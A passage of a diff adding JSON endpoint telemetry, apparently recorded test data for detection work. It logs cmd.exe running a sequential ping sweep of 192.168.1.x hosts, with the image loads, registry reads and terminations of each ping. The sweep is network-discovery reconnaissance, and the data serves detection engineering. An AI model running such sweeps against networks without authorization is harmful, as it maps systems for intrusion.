+ }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4564, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572326980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4564, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572326980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4564, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572326980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4564, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572326980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4564, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572326980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4564, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572326980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4564, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572326980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4564, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572326980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4564, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572326980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" + }, + { + "event_type": "process", + "pid": 4564, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572331990000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.73", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7992, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572332140000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572332140000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572332140000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572332140000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572332140000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572332140000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572332140000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572332140000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572332140000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572332140000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572332140000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572332140000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" + }, + { + "event_type": "process", + "pid": 7992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572336830000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.74", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1640, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572336970000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572336830000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572336830000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572336980000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572336980000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572336980000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572336980000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572336980000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572336980000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572336980000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572336980000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572336980000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" + }, + { + "event_type": "process", + "pid": 1640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572341830000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.75", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5696, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572341980000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572341990000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572341990000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572341990000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572341990000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572341990000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572341990000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572341990000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572341990000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572341990000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572341990000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572341990000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" + }, + { + "event_type": "process", + "pid": 5696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572346830000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.76", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3708, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572346940000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3708, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572346830000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3708, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572346830000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3708, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572346980000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3708, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572346980000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3708, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572346980000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3708, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572346980000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3708, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572346980000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3708, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572346980000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3708, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572346980000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3708, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572346980000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3708, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572346980000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883572349340000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883572349340000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883572349340000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "process", + "pid": 3708, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572351840000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.77", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7576, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572351990000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7576, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572351980000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7576, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572351980000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7576, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572351980000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7576, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572351980000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7576, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572351980000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7576, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572351980000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7576, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572351980000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7576, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572351980000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7576, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572351980000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7576, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572351980000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7576, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572351980000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" + }, + { + "event_type": "process", + "pid": 7576, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572356830000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.78", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4532, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572356970000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572356830000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572356830000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572356990000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572356990000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572356990000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572356990000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572356990000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572356990000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572356990000, + "unique_pid": 